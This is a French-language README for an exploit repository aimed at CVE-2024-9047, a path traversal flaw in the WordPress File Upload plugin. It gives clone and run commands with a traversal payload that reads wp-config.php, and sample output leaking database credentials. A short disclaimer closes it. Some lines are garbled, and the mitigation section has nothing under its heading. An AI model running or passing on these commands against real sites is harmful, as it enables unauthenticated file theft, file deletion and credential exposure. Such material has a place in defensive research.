
Exploit pour le plugin WordPress File Upload - Toutes les versions jusqu'à 4.24.11 sont vulnérables.
Le plugin WordPress File Upload pour WordPress est vulnérable à une faille de Path Traversal dans toutes les versions jusqu'à (et y compris) la version 4.24.11 via le fichier wfu_file_downloader.php. Cette vulnérabilité permet à des attaquants non authentifiés de lire ou de supprimer des fichiers en dehors du répertoire prévu. Une exploitation réussie nécessite que l'installation WordPress ciblée fonctionne sous PHP 7.4 ou antérieur.
Un attaquant peut exploiter cette vulnérabilité en forgeant une requête spécifique vers le point d'accès vulnérable wfu_file_downloader.php et en manipulant le paramètre de chemin de fichier pour obtenir un accès non autorisé à des fichiers sensibles sur le serveur.
4.24.11 ou antérieure).7.4 ou antérieure.Clonez ce dépôt :
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
Installez les dépendances Python (si nécessaire) :
pip install requests
Exécutez le script pour vérifier la version du plugin et exploiter la vulnérabilité :
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
Pour exploiter la configuration vulnérable par défaut et lire le fichier de configuration de WordPress :
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
Pour protéger votre site WordPress :
Ce code est destiné uniquement à des fins éducatives et de recherche. L'utilisation non autorisée de ce script sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de ce code.